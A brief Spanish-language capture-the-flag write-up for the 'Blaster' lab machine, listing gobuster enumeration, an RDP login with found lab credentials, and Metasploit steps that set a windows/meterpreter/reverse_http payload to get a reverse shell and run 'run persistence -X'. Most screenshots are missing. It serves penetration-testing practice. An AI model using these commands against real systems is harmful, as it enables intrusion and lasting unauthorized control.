# Blaster

Nmap

alt text alt text

Fuzzing

gobuster dir -u http://10.10.131.79/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x php
alt text alt text alt text

MSRDP

Nos conectamos al Escritorio remoto

xfreerdp /u:wade /p:parzival /v:10.10.131.79
alt text

En el historial podemos ver el CVE

En este video veremos el CVE en funcionamiento: https://www.youtube.com/watch?v=3BQKpPNlTSo

alt text alt text alt text

Metasploit

alt text alt text

Colocamos el LHOST

Colocamos el payload

set payload windows/meterpreter/reverse_http

Ejecutamos la sesion como job

alt text

Copiamos el código en la consola de la máquina con acceso remoto, ya tendremos una shell meterpreter activa

Ejecutando el siguiente comando, conseguiremos persistencia en la máquina cuando el sistema se ejecuta

run persistence -X